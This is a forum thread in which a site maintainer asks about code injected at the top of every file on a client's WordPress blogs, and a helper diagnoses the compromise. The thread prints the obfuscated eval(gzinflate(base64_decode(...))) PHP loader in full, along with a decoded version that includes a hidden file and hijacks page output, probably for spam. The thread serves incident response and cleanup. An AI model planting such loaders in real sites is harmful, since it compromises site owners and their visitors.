Blog hacked?

My customer told me that he’s adsense suddenly stopped and he is seeing unusual things on his blogs. I checked just one site and I found out there is additional codes on top of all them files…

<?php /f733bf1b10ff77ed52412f18b18b12d7/ eval(gzinflate(base64_decode(‘DZQ1rsUIAgSPszNyYHwGbWRmZicrMzP79PvzDlqt6iqvdPin/tqpGtKj/CdL9xLH/leU+VyU//yHS2yYO0OZ3llzJwyVd5NDCLPREKgmmRrFu8CJnpLuzNaP9MGviHQqGStYIQGz3TkggDPBHxIQPAUtAOzLQXgRJQNbI57fNxUoLpY2s26SU8cF8T0gB1X3ITSi6ZEcXo31CSnV+sGWb3R+ztxl7HCmLNNC8r7ImoB8CYa8J9/IhoepFKdw5CD0PE6TDgulm+J3SxZrgjbUQRmvZ3MnPmoLoMEW3WK+MsHKTaJyOXnL1XPYyKyv1UoSdcTjLovA24kwH9s869rq6YiWJnItZ0T99EsgNZHrRyleI7Oqc2/FPFsXSsWokWdT7ccpuZAjMSzxon2GEoAA8GBgSiiLV2gP8Gex3fBR74aMO0OwD05RSXLsTuYSwMgzwjK/v8VJsLlVS6DL7cdnUSRQXdmw6TtotLRlJ+mc2DxT/OR83nbfaW3KqWnaw9AAaixsGur69R4/TnVeIN8YBKpKep9XL5F9QuvZ0N2vc335mwkFiyT94IZXFolar33wh2SKwTIti1BqB+duZMglbPs1UV/p/OT6sm71kgmYUd1fnDrnxAOD6gQ+ExEBMgYodGJ9a5vovGHcL8tlxbN3HSk/bgiRqBk8SETtAhuD8goos2dledqco4l9jMSZLXdcJe8EsOGTMfPAdPgKMlOF3lRDemPCPqc4RRLTskFwogv4HkcY+IkvjW4BzaOeYtBB5LCrnZvv9b1iPmrFcVcxEraNRvSwtRZ8qVjGRmmlHyiMnz0blRQRFkrNmM5ybK/G4HILRQ5j5xZO8WBADC0tTORTkqJOTmCJAucCdWNI1DiZbE9DkoT8qk9HjB9gVfibqDqaEmHwZlOYpM47DckoAutMCL/k4gO7lYsDqHpm5YWqemgS2QPFIZAHeyWCqV60cWwdd9+uxSQE0HEd67RLukMUkamTb2NURQrZvTjAWfqK1xkMXe9bOxTJoCEjGMmvV4DkKo+b+/o3/Ejgeoar9SwxAwIH8Z9gpxy8UnCfUHXWu3XgyFIm5JTffQQ0yuIvyrMcOIoEUgVf8lYsCCsNFsgvpTTqLDpIyDDhu5HXMZ93LIz+cBzjzTWBT8ZPt+NJsAbg9zNW/oza5Ed7E7RyZOiC4nIHmiUFcqFUfyVRSm+9BrSvLVAFQ8ra1xKwrBcxtjmYzKHO8FnRPd3omNnmca4X6wU5XMK/iKzsojlD/hXL6oVOAhpjQvyxr9IkETmeHodMAJfb/RJfXUVjYY+GcdAD0Glu9pDmfy6RuF6GDYu38oHBjgrd5wBP+qXo0whbeoY+AlTYlNcr93Ba3qkNixiUuFYITZ89uyztQcrymRJZBlifsdq9NsR03wrT9wDkg08/qzGDrG6cKPxjMG6t2W2QgW+GT9Ssef0Ksd2cxuTb8FzwrSQ4qZlgAWFdfuSBlkMMi2RPnnocLYKc7cRiSSol+aXUPlGJb3/jkejgeOtUj7qQehPJ7V9J614A3edqqr+RPro2QZaddLoxj5CtesELGy1mlZbR49raNlQDZeRRS8M5A/fTyUyXDnAT9orQQINQCxD6a4g/pUJL2G0yMHkUWYK9WY6uEus6YHcFwNyr9fFFECcat4Z+QfGPKysLFUfdrxyCSdZqe7byaqX2FKYxCt8s6sbdG+aH+8u96BmteEcWmyohlr1gPnULy+9eWLidRo7W2ArHVe3D5xXNeA91Qh56wMgfeoMDx/wlCy4novGYcSdXGtS4f1nJMryn0bCD267mCQXUhPhymE4zqWBWEjaKMrKez3msh0NTCEyjoosyAPryxNOBsjOl/bv9nED45RAbDeUuhf0UTXTxJ69hJZOzADSb6brAKDoT1qgKIl7fAT/XfTBKsAb6LGk06EIPFfvDAhMc4ramsc8yEax1klBRCBVk1U4VRI4W143hpZbhRZXCKIa35GrFn56K7U6R++oAjvZFCw5EIYG6yK1LunprZoNKUTSxLerJFJeVz5fzhzt6Za/DszXZo4C8NLfxnL/PPmbENSrE3qT1f+IPk/XN480oW0auOpuGW1qGK5AEAAAEQaj6z7///vvf/wM=’)));?>

Can someone tell me what this means?

Thanks a lot,
Jun

Yep, your site has been exploited.

I looked at the code, and it’s trying to include a file:
/home/caspert69/finewoodworkingguide.com/wp-includes/js/tinymce/themes/advanced/skins/o2k7/img/c77.php

This is the code, once it’s ‘decrypted’:


/*bsdtcnmlrwxnahajvlxqaswuszpblvymqbrfwrnfefgldanzep*/ if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/home/caspert69/finewoodworkingguide.com/wp-includes/js/tinymce/themes/advanced/skins/o2k7/img/c77.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

My guess it’s adding some spam links to your pages, check the HTML source to see if that’s so.

Solution? Do a fresh install from fresh sources, after making sure (by contacting your host) that the server is fully secured.

also change every password for the server - cp, db, FTP accounts - everything. If you are using 3rd party code check for security updates for each package

Thanks a lot… It’s not my site actually, it’s my client’s and all sites in that server are affected…